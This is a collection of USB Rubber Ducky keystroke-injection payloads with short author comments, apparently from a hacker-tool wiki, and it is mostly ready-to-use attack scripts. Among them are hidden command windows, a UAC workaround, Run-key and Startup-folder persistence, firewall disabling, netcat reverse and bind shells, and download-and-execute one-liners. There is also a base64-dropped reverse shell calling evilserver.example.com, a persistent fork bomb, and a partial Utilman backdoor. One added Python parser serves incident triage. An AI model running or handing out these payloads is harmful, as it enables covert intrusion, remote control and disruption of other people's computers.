Rubber Ducky Payloads

Boring Utility

Hello World (Windows)

For testing functionality.

DELAY 3000
GUI r
DELAY 500
STRING notepad
DELAY 500
ENTER
DELAY 750
STRING Hello World!!!
ENTER

Hide cmd window (Windows)

The following example hides the command window below the bottom of the screen while commands are typed in. The window-movement part of the script can also be used on any other window. CMD.exe is started with command-line flags that change the appearance of the window to make it harder to view, plus a flag (/V:ON) that turns on delayed expansion in the command prompt, which allows variable names to be called more than once in a line with no adverse effects. Example: SET Something = Something + Something_Else

REM Target: WINDOWS VISTA/7
REM Encoder V2.4
REM Using the run command for a broader OS base.
DELAY 3000
GUI r
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

The following is an attempt at a hide-CMD-window script that uses a key combination to run as administrator when UAC is turned on.

REM Target: WINDOWS VISTA
REM Encoder V2.4
REM Purpose: Hide cmd window script that uses a key combo to circumvent UAC limitations.
DELAY 3000
CONTROL ESCAPE
DELAY 500
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
CTRL-SHIFT ENTER
DELAY 1000
ALT C
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

Other windows can be hidden the same way, as this PowerShell hide, download, and execute script demonstrates.

REM Target: WINDOWS VISTA/7
REM Encoder V2.4
REM Using the run command for a broader OS base.
DELAY 3000
GUI r
DELAY 1000
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

Windows can also be hidden off the other sides of the screen: replace DOWNARROW with RIGHTARROW, LEFTARROW, or UPARROW.

Basic Terminal Commands (Ubuntu)

The following script is an example of how to execute commands in Ubuntu Linux through xterm. The script first opens Ubuntu's run-application window and then launches xterm from it. Once the terminal is running, it issues the commands “pwd”, “id” and “cat /etc/passwd”.

DELAY 3000
ALT F2
DELAY 500
STRING xterm
DELAY 500
ENTER
DELAY 750
STRING pwd
DELAY 500
ENTER
DELAY 300
STRING id
DELAY 300
ENTER
DELAY 500
STRING cat /etc/passwd
DELAY 500
ENTER

Mobiletabs (Windows)

Types in a VBScript that passes its command-line arguments to Internet Explorer and opens a new tab for each URL you specify on the command line.

GUI r
STRING cmd /Q /D /T:0a /F:OFF /V:OFF /K
DELAY 500
ENTER
DELAY 750
REM DELETE THE SCRIPT IF IT ALREADY EXISTS
STRING DEL /Q MobileTabs.vbs
ENTER
REM VB SCRIPT FOUND AT:
REM http://www.vistaheads.com/forums/microsoft-public-internetexplorer-general/438407-command-line-open-several-websites-multiple-tabs.html
REM INPUT FILE MobileTabs.vbs
STRING copy con MobileTabs.vbs
ENTER
STRING on error resume next
ENTER
STRING navOpenInBackgroundTab = &h1000
ENTER
STRING set oIE = CreateObject("InternetExplorer.Application")
ENTER
STRING Set args = WScript.Arguments
ENTER
STRING oIE.Navigate2 args.Item(0)
ENTER
STRING for intx = 1 to args.count - 1
ENTER
STRING oIE.Navigate2 args.Item(intx), navOpenInBackgroundTab
ENTER
STRING next
ENTER
STRING oIE.Visible = true
ENTER
CONTROL z
ENTER
REM RUN THE VB SCRIPT TO LAUNCH INTERNET EXPLORER
REM THE DOUBLE QUOTES BECOME MORE IMPORTANT FOR LONGER URLs
STRING MobileTabs.vbs "http://www.google.com/" "http://mwomercs.com/" "http://hak5.org/" "http://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/"
ENTER

Generic batch

A generic batch payload with built-in persistence via a registry key. Only runs as advertised on admin accounts.

REM Target: WINDOWS VISTA/7
REM ADMIN PRIVILEGES
REM PURPOSE: to create a script that types in a generic batch file and executes silently.
REM Using the run command for a broader OS base.
DELAY 3000
GUI r
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Make batch file.
REM Delete batch file if already exists.
STRING erase /Q batch.bat
ENTER
REM Make the batch file.
STRING copy con batch.bat
ENTER
REM Registry key that restarts script on reboot.
STRING REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Persistence /t REG_SZ /d "wscript.exe %TEMP%\invis.vbs %TEMP%\batch.bat" /f
ENTER
REM Move invis.vbs to another location
STRING move invis.vbs %TEMP%
ENTER
REM Move the current batch file to another location.
STRING move %0 %TEMP%
ENTER
REM Continue batch file contents here. . .
CONTROL z
ENTER
REM Make the VBS file that allows running invisibly.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL z
ENTER
STRING wscript.exe invis.vbs batch.bat
ENTER
STRING exit
ENTER
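
For triage of a payload file recovered from a device, the script text can be replayed offline to list the commands it types and the files it creates through "copy con". The following is an added example, not part of the original payload collection: it parses a constructed excerpt styled on the script above and reports any Run-key value written. The function names, the ALT SPACE menu heuristic and the timing model (DEFAULT_DELAY after every non-DELAY command) are assumptions.

```python
import re

# Constructed sample: a shortened excerpt in the style of the script above.
SAMPLE = r'''
DEFAULT_DELAY 25
DELAY 3000
GUI r
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
ENTER
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
STRING copy con batch.bat
ENTER
STRING REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Persistence /t REG_SZ /d "wscript.exe %TEMP%\invis.vbs %TEMP%\batch.bat" /f
ENTER
STRING move %0 %TEMP%
ENTER
CONTROL z
ENTER
STRING wscript.exe invis.vbs batch.bat
ENTER
'''

COPY_CON = re.compile(r'^copy\s+con\s+(\S+)$', re.I)
RUN_KEY = re.compile(
    r'reg\s+add\s+(\S*\\CurrentVersion\\Run(?:Once)?)\s.*?/v\s+(\S+).*?/d\s+"([^"]*)"', re.I)

def parse_ducky(script):
    """Replay DuckyScript text and return what it types, without sending any keys."""
    commands, files, keys = [], {}, []
    buf, open_file, eof_seen, menu = '', None, False, False
    default_delay, runtime_ms, last = 0, 0, None

    def step(line):
        nonlocal buf, open_file, eof_seen, menu, runtime_ms
        word, _, arg = line.partition(' ')
        word = word.upper()
        if word == 'DELAY':
            runtime_ms += int(arg)
            return
        runtime_ms += default_delay           # assumption: added after each non-DELAY command
        if word == 'STRING' and menu:
            keys.append(arg)                  # menu accelerator, not command text
            menu = arg.upper() in ('M', 'S')  # Move/Size stay modal until ENTER
        elif word == 'STRING':
            buf += arg
        elif word == 'ENTER' and menu:
            menu = False
        elif word == 'ENTER':
            if open_file is None:
                if buf:
                    commands.append(buf)
                m = COPY_CON.match(buf.strip())
                if m:                         # following lines go into this file
                    open_file = m.group(1)
                    files[open_file] = []
            elif eof_seen:                    # Ctrl-Z then ENTER closes "copy con"
                open_file, eof_seen = None, False
            else:
                files[open_file].append(buf)
            buf = ''
        elif word in ('CONTROL', 'CTRL') and arg.lower() == 'z' and open_file is not None:
            eof_seen = True
        else:
            keys.append(line)
            if (word, arg.upper()) == ('ALT', 'SPACE'):
                menu = True                   # window system menu is open

    for raw in script.splitlines():
        line = raw.strip()
        word = line.split(' ', 1)[0].upper()
        if not line or word == 'REM':
            continue
        if word in ('DEFAULT_DELAY', 'DEFAULTDELAY'):
            default_delay = int(line.split()[1])
        elif word == 'REPEAT' and last:
            for _ in range(int(line.split()[1])):
                step(last)                    # replay the previous command n more times
        else:
            step(line)
            last = line
    return {'commands': commands, 'files': files, 'keys': keys, 'min_runtime_ms': runtime_ms}

def run_key_entries(parsed):
    """List Run/RunOnce values set by typed commands or by files the script creates."""
    sources = [('typed', parsed['commands'])] + list(parsed['files'].items())
    found = [(origin, RUN_KEY.search(text)) for origin, lines in sources for text in lines]
    return [{'origin': o, 'key': m.group(1), 'value': m.group(2), 'data': m.group(3)}
            for o, m in found if m]

if __name__ == '__main__':
    print(run_key_entries(parse_ducky(SAMPLE)))
```

The Run-key value name and data recovered this way give an incident responder the exact registry entry and dropped file names to look for on hosts where the device was plugged in.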

Run exe from SD

The following is a payload I have been working on that waits until a drive labeled “DUCKY” is mounted. I have used some of midnightsnake’s code in this payload. The name of the file that is run can be changed to .exe; I am just having it run a batch for testing purposes. The line that says “STRING START %myd%\myEXE.bat” is the line that executes the executable.

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts.
REM Encoder V2.4
REM Using the run command for a broader OS base.
DEFAULT_DELAY 25
DELAY 3000
GUI r
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %myd%\HelloWorld.exe
ENTER
CONTROL z
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

The following is the batch file that is run after the “DUCKY” drive has been mounted. Everything is being run invisibly, so you will need to check for the existence of “Message.txt” which will probably be in “C:\Windows\system32”.

REM Message.txt
echo Hello World!!!
echo Hello World!!! > Message.txt

The encoders now support the REPEAT command, so it should only be a problem if you are using an old encoder. Encoders also now support white space in the duck script, so functions have been separated with white space.

The following is a newer version of the RunEXE from SD payload which uses googleknowsbest’s method for finding the “DUCKY” drive, which is more portable than the previous version’s method. This version should work on all current Windows versions. (XP, Vista, 7).

REM Author: overwraith
REM Name: RunEXE_V2.txt
REM Purpose: Run an executable file off of the SD card after it mounts. Uses googleknowsbest's slightly more portable method to find the "Ducky" drive.
REM Encoder V2.4
REM Using the run command for a broader OS base.
DEFAULT_DELAY 75
DELAY 3000
GUI r
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
ENTER
STRING if Exist %DUCKYdrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %DUCKYdrive%\HelloWorld.exe
ENTER
CONTROL z
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
REM STRING EXIT
REM ENTER

The following is another take on the RunEXE from SD payload. I think the micro SD connection is faster than it used to be; it could just be me. Here I am using a special for loop which uses the ‘Vol’ command for volume information. I am pretty sure it runs on most Windows boxes, and am reasonably sure it runs on most old computers. The main reason for the revamp is to eliminate some of the problems associated with the ‘diskpart’ command, which if run on a non-admin box will cause previous scripts to essentially hang.

REM Author: overwraith
REM Name: RunEXE_V3.txt
REM Purpose: Run an executable file off of the SD card after it mounts. Uses a slightly different version of the drive finder code.
REM Encoder V2.4+
REM Using the run command for a broader OS base.
DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do (
ENTER
STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do (
ENTER
STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" )
ENTER
STRING )
ENTER
STRING )
ENTER
STRING if Exist %DuckyDrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %DuckyDrive%\HelloWorld.exe
ENTER
CONTROL z
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

Run java from SD

The following is another payload for running applications on Twin duck firmware from off your SD card automatically. This payload waits for the ducky drive to mount, then switches to the directory containing the Java payload, then launches the payload. I don’t know how useful this will be, but it is here if you need it. This only runs on Windows systems, but should run on all current Windows thanks to some code written by googleknowsbest. Change “JavaApp” to the name of your application.

REM Author: overwraith
REM Name: Java_Application.txt
REM Purpose: Run a java application off the ducky drive after it mounts.
REM Encoder V2.4
REM Using the run command for a broader OS base.
DEFAULT_DELAY 25
DELAY 3000
GUI r
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
ENTER
STRING if Exist %DUCKYdrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING %DUCKYdrive%
ENTER
STRING cd Java_Application
ENTER
STRING Java JavaApp
ENTER
CONTROL z
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

If you are not keeping this script and the application within a folder on the ducky drive, then remove this line:

STRING cd Java_Application
ENTER

Copy file to Desktop

The following is something I have been working on based on the payload “Runexe from SD”. This payload will work on the twin duck firmwares by executing a script that waits for the ducky to mount the removable storage. The payload also uses some of the member googleknowsbest’s code. The for loop which polls for the ducky is the code to which I am referring. This payload is not hacking related per se, but it could be useful to those who miss autorun files, and sneaker nets.

REM Author: overwraith
REM Name: CopyFileToDesktop.txt
REM Purpose: Wait for ducky mass storage to mount, then copy file to desktop.
REM Encoder V2.4
REM Using the run command for a broader OS base.
DEFAULT_DELAY 75
DELAY 3000
GUI r
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
ENTER
STRING if Exist %DUCKYdrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
REM Remove the next two lines if you don't place your payloads in separate folders.
STRING set DUCKYdrive=%DUCKYdrive%\CopyFileToDesktop\
ENTER
STRING copy %DUCKYdrive%HelloWorld.exe %userprofile%\Desktop\HelloWorld.exe
ENTER
CONTROL z
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

There is a group of lines you may wish to remove if you are operating from the root of the ducky; I have the script running out of a folder on the ducky, not the root.

REM Remove the next two lines if you don't place your payloads in separate folders.
STRING set DUCKYdrive=%DUCKYdrive%\CopyFileToDesktop\
ENTER

The script copies HelloWorld.exe out of the folder “CopyFileToDesktop”.

EICAR AV test (Windows)

DEFAULTDELAY 500
GUI r
STRING notepad.exe
ENTER
STRING X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
CTRL s
STRING %USERPROFILE%\desktop\eicar.com
ENTER
ALT F4

Download/Upload

Netcat FTP download and reverse shell (Windows)

This script will:

Fill in the required information where you see the brackets.

DELAY 10000
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING cd %USERPROFILE%
ENTER
DELAY 100
STRING netsh firewall set opmode disable
ENTER
DELAY 2000
STRING echo open [IP] [PORT] > ftp.txt
ENTER
DELAY 100
STRING echo [USERNAME]>> ftp.txt
ENTER
DELAY 100
STRING echo [PASSWORD]>> ftp.txt
ENTER
DELAY 100
STRING echo bin >> ftp.txt
ENTER
DELAY 100
STRING echo get nc.exe >> ftp.txt
ENTER
DELAY 100
STRING echo bye >> ftp.txt
ENTER
DELAY 100
STRING ftp -s:ftp.txt
ENTER
STRING del ftp.txt & exit
ENTER
DELAY 2000
GUI r
DELAY 200
STRING nc.exe [LISTENER IP] [LISTENER PORT] -e cmd.exe -d
ENTER
DELAY 2000
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING exit
ENTER

Netcat Reverse Shell (Windows)

Change the following details:

REM Title: Netcat Reverse Shell
REM Author: Kanishk Singh
REM Version: 1
REM Description:
DELAY 200
REM --> Minimize all windows
WINDOWS d
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb RunAs
ENTER
DELAY 1500
ALT y
DELAY 500
STRING cd %TEMP%
ENTER
REM --> Kills already running Netcat instance (if any)
STRING TASKKILL /im nc.exe /f
ENTER
REM --> Delete nc.exe file if it already exists
STRING erase /Q nc.exe
ENTER
REM --> Delete Start batch file if it already exists
STRING erase /Q Start.bat
ENTER
REM --> Delete Invisible.vbs in temp folder, if it already exists
STRING erase /Q invisible.vbs
ENTER
REM --> Delete invisible.vbs file in Startup if it already exists
STRING erase /Q "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\invisible.vbs"
ENTER
DELAY 500
REM --> Downloads NetCat
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://[NETCAT_DOWNLOAD_LINK]/nc.exe','nc.exe')
ENTER
DELAY 500
REM --> Creates a batch file to start listening
STRING copy con Start.bat
ENTER
STRING nc -lp [PORT] -vv -e cmd.exe -L
ENTER
CONTROL z
ENTER
REM --> Starts batch file invisibly
STRING copy con invisible.vbs
ENTER
STRING Set WshShell = CreateObject("WScript.Shell" )
ENTER
STRING WshShell.Run chr(34) & "%TEMP%\Start.bat" & Chr(34), 0
ENTER
STRING Set WshShell = Nothing
ENTER
CONTROL z
ENTER
REM --> Add netcat to allowed programs list, enabling it to communicate through the firewall seamlessly
STRING netsh advfirewall firewall add rule name="Netcat" dir=in action=allow program="%TEMP%\nc.exe" enable=yes
ENTER
STRING start invisible.vbs
ENTER
DELAY 100
REM --> Copies invisible.vbs to startup folder for persistence
STRING copy "invisible.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
ENTER
REM --> Kills CMD while nc.exe continues running in background, remove Ducky after CMD closes
STRING exit
ENTER

Downloader (Windows)

Opens the command prompt (not as administrator) and creates a VBScript that downloads a file from any URL. It then downloads a file and executes it. Useful for downloading small .exe files from a web server and executing them.

ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
ENTER
DELAY 400
STRING copy con download.vbs
ENTER
STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/")))
ENTER
STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send()
ENTER
STRING If objXMLHTTP.Status = 200 Then
ENTER
STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open
ENTER
STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0
ENTER
STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a
ENTER
STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing
ENTER
STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing
ENTER
CTRL z
ENTER
STRING cscript download.vbs <INSERT URL HERE>
ENTER
STRING <INSERT EXE FILENAME HERE>
ENTER
STRING exit
ENTER

Example:

ENTER
STRING cscript download.vbs http://example.com/fun_windows_executable.exe
ENTER
STRING fun_windows_executable.exe
ENTER
STRING exit
ENTER

FTP download/upload (Windows)

This script downloads WinSCP and uploads the user profile, recursively, to an FTP server.

GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING cd %USERPROFILE%
ENTER
STRING ftp -i SERVER
ENTER
DELAY 800
STRING USERNAME
ENTER
STRING PASSWORD
ENTER
STRING GET WinSCP.com
ENTER
DELAY 200
STRING GET WinSCP.exe
ENTER
DELAY 3000
STRING quit
ENTER
REM FTP user only needs write access.
STRING WinSCP.com /command "option batch abort" "option confirm off" "open ftp://USERNAME2:PASSWORD2@SERVER2" "put *.*" "close" "exit"
ENTER
ALT SPACE
STRING N

Powershell wget execute (Windows)

Opens the “RUN” box, types a PowerShell string, and presses Enter. Supports HTTP/S and proxies.

GUI r
DELAY 100
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://example.com/bob.txt',\"$env:temp\bob.exe\"); Start-Process \"$env:temp\bob.exe\""
ENTER

NOTE: -windowstyle hidden (abbreviated to -W Hidden in the script above) hides the PowerShell window. Also mind the escaped quotes around $env:temp, otherwise the environment variable won’t expand.

This is an improved version of the code above.

REM You can remove this DELAY line at the beginning (I just prefer having it, just in case).
DELAY 60000
REM Open the Run dialog.
GUI r
REM Change this value depending on how fast or slow the computer you are using is.
DELAY 100
STRING powershell -windowstyle hidden
ENTER
REM The shell usually takes a few seconds to fully start, so I put in a delay just in case.
DELAY 1000
REM I just wanted to note that the file can be an EXE or a JAR file; it doesn't really matter.
REM If you put only the file name in the destination, the file will be saved under C:\Users\LoggedInUser
STRING $source = "File URL "; $destination = "Path\FileName"; Invoke-WebRequest $source -OutFile $destination;
ENTER
DELAY 5000
STRING start-process FileName.EXE
ENTER
DELAY 100
STRING exit
ENTER

Full Example with Jar:

REM You can remove this DELAY line at the beginning (I just prefer having it, just in case).
DELAY 60000
REM Open the Run dialog.
GUI r
REM Change this value depending on how fast or slow the computer you are using is.
DELAY 100
STRING powershell -windowstyle hidden
ENTER
REM The shell usually takes a few seconds to fully start, so I put in a delay just in case.
DELAY 1000
REM I just wanted to note that the file can be an EXE or a JAR file; it doesn't really matter.
REM If you put only the file name in the destination, the file will be saved under C:\Users\LoggedInUser
STRING $source = "http://192.168.43.34/Service.jar"; $destination = "Service.jar"; Invoke-WebRequest $source -OutFile $destination;
ENTER
DELAY 5000
STRING start-process Service.jar
ENTER
DELAY 100
STRING exit
ENTER

Download and execute file with Powershell (Windows)

REM Windows 10: PowerShell administrator download and execute file
REM Author: Judge2020
REM author website: Judge2020.com
REM
REM start of script
REM
REM let the HID enumerate
DELAY 1000
GUI r
DELAY 200
REM my best attempt at an elevated powershell instance
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 1000
ALT y
DELAY 200
STRING $down = New-Object System.Net.WebClient; $url = 'http://www.greyhathacker.net/tools/messbox.exe'; $file = 'mess1.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;

Wget and execute (OSX)

REM Simple script that downloads any file and runs it.
REM Requires duckencoder 2.6.3 which can be downloaded at http://goo.gl/QkTXNp
REM Note: you must put in your own specific code to execute
DELAY 1000
COMMAND SPACE
DELAY 800
STRING Terminal
DELAY 500
ENTER
DELAY 500
STRING curl http://SERVER/path/to/file > file
ENTER
DELAY 1000
STRING INSERT COMMAND TO EXECUTE HERE
ENTER
REM You can change the above line to the command used to open your program.
REM Examples: python somescript.py , ./somescript.sh
REM Note: This script doesn't delete the downloaded file so it may leave evidence of physical access.  Delete it as quickly as possible after this runs.
REM Or alternatively you could hide it somewhere in a hidden folder where it won't be easily found.

Hacks & Exploits

Reverse shell (Windows)

Opens an administrative CMD prompt, creates decoder.vbs containing code that converts base64-encoded ASCII to binary, then creates a text file holding the base64 ASCII of the binary file that creates the reverse shell. The first file converts the second file to an exe, which is executed with host and port parameters.

ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 600
LEFTARROW
ENTER
DELAY 400
STRING copy con c:\decoder.vbs
ENTER
STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)
STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS =
STRING CreateObject("Scripting.FileSystemObject"):
ENTER
STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded =
STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function
STRING decodeBase64(base64):
ENTER
STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):
STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub
STRING writeBytes(file, bytes):Dim binaryStream:
ENTER
STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:
STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
ENTER
CTRL z
ENTER
STRING copy con c:\reverse.txt
ENTER
CTRL z
ENTER
STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe
ENTER
STRING c:\reverse.exe evilserver.example.com 8080
ENTER
STRING exit
ENTER

Receive reverse shell with netcat. For example:

nc -l 8080

Fork bomb (Windows)

Opens a command prompt as administrator and uses copy con to create a fork bomb batch file (if you don’t know what this is, see: http://en.wikipedia.org/wiki/Fork_bomb). It then saves the .bat file in the Startup programs folder and runs it for the first time.

CONTROL ESCAPE
DELAY 200
STRING cmd
DELAY 200
MENU
DELAY 100
STRING a
ENTER
DELAY 200
LEFT
ENTER
DELAY 1000
STRING cd %ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup\
ENTER
STRING copy con a.bat
ENTER
STRING @echo off
ENTER
STRING :START
ENTER
STRING start a.bat
ENTER
STRING GOTO START
ENTER
CONTROL z
ENTER
STRING a.bat
ENTER
ALT F4

Utilman exploit (Windows)

Uses the Utilman.exe Exploit to create a new local administrator account “Local000” with the password “hak5”.

GUI
DELAY 50
STRING cmd
MENU
STRING a
ENTER
LEFT
ENTER
DELAY 200
STRING takeown /f "%systemroot%\System32\Utilman.exe"
ENTER
DELAY 50
STRING icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T
ENTER
DELAY 50
STRING cd %systemroot%\System32
ENTER
DELAY 50
STRING mkdir util
ENTER
STRING xcopy cmd.exe util\
ENTER
DELAY 50
